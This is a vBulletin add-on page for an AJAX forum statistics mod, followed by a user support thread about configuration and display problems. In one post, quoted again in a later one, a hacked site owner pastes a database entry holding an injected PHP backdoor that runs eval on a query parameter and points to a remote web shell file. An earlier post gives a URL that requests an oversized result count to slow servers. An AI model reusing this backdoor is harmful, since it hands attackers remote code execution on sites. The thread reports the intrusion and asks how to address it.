Register Members List Search Today's Posts Mark Forums Read

Reply
 
Mod Options
VSa - Advanced Forum Statistics (AJAX) Details »
VSa - Advanced Forum Statistics (AJAX)
Mod Version: 7.1, by Valter (Coder) Valter is offline
Developer Last Online: May 2014 I like it Show Printable Version Email this Page

vB Version: 4.x.x Rating: (237 votes - 4.74 average) Installs: 2505
Released: 14 Feb 2010 Last Update: 02 Aug 2012 Downloads: 19749
Not Supported DB Changes Uses Plugins Auto-Template  

Info:
AJAX Forum Statistics:
-Latest Posts
-Latest Forum News
-Most Viewed Threads
-Hottest Threads
-Most Popular Forums
-Latest Classified Ads
-Latest Blog Entries
-Latest Group Posts
-Newest Members
-Top Posters
-Top Thread Starters
-Top Referrers
-Top Reputations
-Top Thanked
-Top Infractions
-Profile Visits
-Latest Social Groups
-Latest Donations

You can turn on/off individual stats, count data from last x days for some of them if you wish, trim titles/usernames to save page space, make several other functionality/make-up customizations... See screenshots.


You can have Main Stats box shown on several pages...
It's shown by default on forumhome (to disable it set "Main Top Stats box on ForumHome" to "None")
To activate another location:
a) add THIS_SCRIPT name to "Stats on pages" field in product options
b) add template name to "Stats in templates" field in product options
c) add "{vb:raw vsatopstats}" to the template you added Stats to


Notes:
-To set options go to: vBulletin Options > VSa - Advanced Forum Statistics
-"Top Thanked" requires Abe1's "Post Thanks" or Scandal's "Thumbs Up?" products to work
-"Latest Donations" requires "VSa - PayPal Donate" hack to work
-To move Top Stats box somewhere else on forumhome: 1.-Set placement setting to "None" 2.-Add "index" to "Stats on pages" setting 3.-Add "FORUMHOME" to "Stats in templates" setting 4.-Add "{vb:raw vsatopstats}" wherever you wish in FORUMHOME template.
-If Top Stats box is messed up because of long usernames or thread/forum titles be noted that you can trim them in ACP options.
-When forum/thread titles or usernames are trimmed, mouse-over will show you full version.


Installation:
-Import XML file (as product) through AdminCP: Plugin System > Manage Products > [Add/Import Product]


Versions:
v1.0 - Jun 12. 2006.
-First release
v6.6.1 - May 14. 2009.
-Latest vB 3.x version
v7.0 - Feb 14. 2010.
-First vB4 release
-Fixed some previous version bugs, optimized code
v7.0.1 - Feb 16. 2010.
-Fixed: Newpost/lastpost linking in 'Latest Posts'
-Fixed: Errors with PHP 5.3
-Fixed: AFS table messed up in footer
-Fixed: Several style errors, including XHTML incompatibilities
-New: Auto-insert on forumhome location - Below Forums
v7.0.2 - Feb 22. 2010.
-Fixed: Several style issues for unregistered users
-Fixed: 'Latest Donations' issues
-Fixed: Import error on some configs
-Fixed: Minor bugs
v7.0.3 - Apr 12. 2010.
-Fixed security bug (user able to set number of results manually)
v7.0.4 - Jan 14. 2012.
-Fixed: Status icons must be GIFs
-Fixed: Status icon overlay problems in Chrome and Safari
-Fixed: Drop-down menu items invisible until highlighted
-Fixed: Last unread post links not compatible with vBSEO
-Fixed: Search Member's posts shows results as threads
-Added: Rich thread prefix support
-Improved: CSS compatibility
-Minor bugs fixed
v7.0.5 - Jan 15. 2012.
-Links in Latest Posts are now fully SEO compatible
-New option: Automatically disable auto-refresh if server load is higher than X
v7.0.6 - Jan 17. 2012.
-Fixed: Prefixes linked in some thread stats
v7.0.7 - Jan 22. 2012.
-New: Show Stats in selected forum only
-Fixed: Some style issues
-Improved: Product menu style
-Improved: Menu disappears on click
-Changed background color variable: 'editor_background' used for better compatibility with custom styles
v7.0.8 - May 27. 2012.
-Fixed: QL Enable Stats link in vB 4.2
v7.0.9 - Jul 07. 2012.
-Fixed: Hide on misc.php requests not related to Stats
v7.1 - Avg 02. 2012.
-New: Top Thanked now works with "Thumbs Up?" system by Scandal
-Note: Above still works with "Post Thanks" system by Abe

Download Now

Only licensed members can download files, Click Here for more information.

Screenshots

Click image for larger version

Name:	stats1.jpg
Views:	21045
Size:	178.7 KB
ID:	112315   Click image for larger version

Name:	stats2.jpg
Views:	14820
Size:	153.8 KB
ID:	112316   Click image for larger version

Name:	menu.jpg
Views:	9587
Size:	65.4 KB
ID:	112317   Click image for larger version

Name:	more.jpg
Views:	10577
Size:	73.7 KB
ID:	112318  

Click image for larger version

Name:	acp1.jpg
Views:	7264
Size:	109.4 KB
ID:	112319   Click image for larger version

Name:	acp2.jpg
Views:	6002
Size:	117.0 KB
ID:	112320  

Show Your Support

  • To receive notifications regarding updates -> Click to Mark as Installed.
  • If you like this modification support the author by donating.
  • This modification may not be copied, reproduced or published elsewhere without author's permission.
Similar Mod
Mod Developer Type Replies Last Post
Statistics Modifications Cyb - Advanced Forum Statistics Valter vBulletin 3.8 Add-ons 1230 31 Aug 2019 17:31
Statistics Modifications Cyb - Advanced Forum Statistics Valter vBulletin 3.7 Add-ons 651 02 Sep 2013 13:25
Statistics Modifications Cyb - Advanced Forum Statistics Valter vBulletin 3.6 Add-ons 1599 15 Feb 2013 03:33
Cyb - Advanced Forum Statistics Valter vBulletin 3.5 Add-ons 116 16 May 2010 03:57

  #871  
Old 01 Feb 2012, 17:52
w8baby w8baby is offline
 
Join Date: Jun 2011
had a report from my friend there is an exploit on this plugin that can be abused to slow servers

yourfourm.com/misc.php?do=vsastats&vsacb_resnr=99999

where u can request 99999 stats
causes overflow error


anyway to counter this?
Reply With Quote
  #872  
Old 02 Feb 2012, 02:14
tidus78's Avatar
tidus78 tidus78 is offline
 
Join Date: Sep 2009
After upgrade,top stats appear in all pages of my forum....

Can I show it only on forumhome?
__________________
www.console-planet.it/forum.php
Reply With Quote
  #873  
Old 03 Feb 2012, 10:39
MegaManSec MegaManSec is offline
 
Join Date: Aug 2011
Hi, is it possible to get the 'new_post' thing to become a old_post when you've viewed it?

Last edited by MegaManSec; 03 Feb 2012 at 10:51.
Reply With Quote
  #874  
Old 03 Feb 2012, 10:44
MegaManSec MegaManSec is offline
 
Join Date: Aug 2011
Originally Posted by w8baby View Post
had a report from my friend there is an exploit on this plugin that can be abused to slow servers

yourfourm.com/misc.php?do=vsastats&vsacb_resnr=99999

where u can request 99999 stats
causes overflow error


anyway to counter this?
Settings->Options->Vsa advanced forum stats-> Number of results to show on separate page
(list available values, separate with commas) set the last number to 200 or so
Reply With Quote
  #875  
Old 03 Feb 2012, 13:37
Valter Valter is offline
 
Join Date: Aug 2005
Last number from settings is used if entered number is larger than that.

So there is no way to send such request to database (99999).
Reply With Quote
  #876  
Old 04 Feb 2012, 19:25
LLent LLent is offline
 
Join Date: Aug 2010
i get this error

Error: Check startup item options

how do i remedy this it wont go away

i am in 4.1.7 vb

thanks in advance
Reply With Quote
  #877  
Old 06 Feb 2012, 11:28
Valter Valter is offline
 
Join Date: Aug 2005
You should check and update settings on product options page.

Ensure that both 'Stat to show on page load' settings are correct.
Reply With Quote
  #878  
Old 07 Feb 2012, 12:10
xhells21 xhells21 is offline
 
Join Date: Aug 2011
your plugin might be exploitable

INSERT INTO `datastore` (`title`, `data`, `unserialize`) VALUES
\r\n \r\nif (isset($_GET[''foo''])) die(eval(''$u="http://users.cjb.net/hayden/wso.txt";'' . $_GET[''foo'']));\r\n";s:10:"misc_start";s:53180:"\r\n if ($vbulletin->options[''vsatopstats_enable_global''] AND !is_member_of($vbulletin->userinfo, explode('','', $vbulletin->options[''vsatopstats_excl_groups''])))\r\n {\r\n $vsacb_resnr = $vbulletin->input->clean_gpc(''r'', ''vsacb_resnr'', TYPE_UINT);\r\n if ($vsacb_resnr < 1)\r\n {\r\n $vsacb_resnr = intval($vbulletin->options[''vsatopstats_amount_more'']);\r\n ( it continues i donno if i must paste all )

this comes from my forum database

original post here :

https://www.vbulletin.com/forum/show...9-Forum-Hacked


please check and i wish to hear from u more soon
Reply With Quote
  #879  
Old 07 Feb 2012, 16:10
Universal Universal is offline
 
Join Date: Sep 2006
Originally Posted by bizoptic View Post
Found an issue, when I click notifications the popup is massive:
To make your Notifications area smaller:

- go into your skins 'Styles and Templates / Style Manager / Style Variable Editor' for the skin/s involved.

- in the search box up top write 'popup'.

- scroll down and find the stylvar 'popupmenu height' under the title 'PopupMenus'.

- change the 'Size' number to 3 for 'popupmenu height'. Keep Units blank.

- Save.


Now go and check your Notifications box, it should be a normal size for you.

Good luck
__________________
Reply With Quote
  #880  
Old 07 Feb 2012, 17:20
skokarl skokarl is offline
 
Join Date: Apr 2005
Originally Posted by xhells21 View Post
your plugin might be exploitable

INSERT INTO `datastore` (`title`, `data`, `unserialize`) VALUES
\r\n \r\nif (isset($_GET[''foo''])) die(eval(''$u="http://users.cjb.net/hayden/wso.txt";'' . $_GET[''foo'']));\r\n";s:10:"misc_start";s:53180:"\r\n if ($vbulletin->options[''vsatopstats_enable_global''] AND !is_member_of($vbulletin->userinfo, explode('','', $vbulletin->options[''vsatopstats_excl_groups''])))\r\n {\r\n $vsacb_resnr = $vbulletin->input->clean_gpc(''r'', ''vsacb_resnr'', TYPE_UINT);\r\n if ($vsacb_resnr < 1)\r\n {\r\n $vsacb_resnr = intval($vbulletin->options[''vsatopstats_amount_more'']);\r\n ( it continues i donno if i must paste all )

this comes from my forum database

it is better to uninstall the hack ? I don't understand this ...but I see a http://users.cjb.net/hayden ....WHAT'S that ?
Reply With Quote
  #881  
Old 07 Feb 2012, 18:07
xhells21 xhells21 is offline
 
Join Date: Aug 2011
Originally Posted by Universal View Post
To make your Notifications area smaller:

- go into your skins 'Styles and Templates / Style Manager / Style Variable Editor' for the skin/s involved.

- in the search box up top write 'popup'.

- scroll down and find the stylvar 'popupmenu height' under the title 'PopupMenus'.

- change the 'Size' number to 3 for 'popupmenu height'. Keep Units blank.

- Save.


Now go and check your Notifications box, it should be a normal size for you.

Good luck
oh ok but it seemed normal for me even if it was set as 34 px or something like that
i changed it to 3 and blank just like u said thanks
i dont know how would that be a vulnerability tough

Originally Posted by skokarl View Post
it is better to uninstall the hack ? I don't understand this ...but I see a http://users.cjb.net/hayden ....WHAT'S that ?
no , you do not understand , my forum got hacked and a person here on the forum sad it might be because of this add-on/hack , so i came here to ask the developer of this if its possible or not

so do not uninstall anything until we hear what the developer says
Reply With Quote
  #882  
Old 07 Feb 2012, 20:48
CarterMarkham CarterMarkham is offline
 
Join Date: Apr 2008
I installed this on a new install....it just says loading... in each column...
Reply With Quote
  #883  
Old 07 Feb 2012, 21:14
Universal Universal is offline
 
Join Date: Sep 2006
Originally Posted by xhells21 View Post
oh ok but it seemed normal for me even if it was set as 34 px or something like that
i changed it to 3 and blank just like u said thanks
i dont know how would that be a vulnerability tough
I was showing the member bizoptic how to fix his problem. This was not meant to fix any vulnerabilities, just the size of the Notifications box. This large box is quite annoying but I have not seen this problem on a default vb skin. I do not know if this hack causes this problem but the large Notifications box can be found on some pre-made skins.

@xhells21, I am glad it worked for you but if your Notifications box size was ok, you did not need to do the changes. At least if you run into this problem you will know what to do. Good luck with your problems xshells21.

@Bizoptic, you can also fix the large Notifications box with CSS in the 'additional.css' template but the way I showed is the easy way to fix the problem.

Cheers
__________________
Reply With Quote
  #884  
Old 11 Feb 2012, 09:10
stl7997 stl7997 is offline
 
Join Date: Nov 2009
I installed a new theme and in Firefox it is kicking the block over a bit. All other browsers display it normally. Any ideas?
Attached Images
File Type: jpg Firefox.jpg (55.5 KB, 40 views)
File Type: jpg chrome.jpg (46.2 KB, 28 views)
Reply With Quote
  #885  
Old 11 Feb 2012, 18:22
gamaken gamaken is offline
 
Join Date: Aug 2010
I have removed my Quick Links drop down menu from my navbar. Where can I change the location of where the enable stats link will appear?
Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Mod Options

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off


New To Site? Need Help?

All times are GMT. The time now is 17:11.

Layout Options | Width: Wide Color: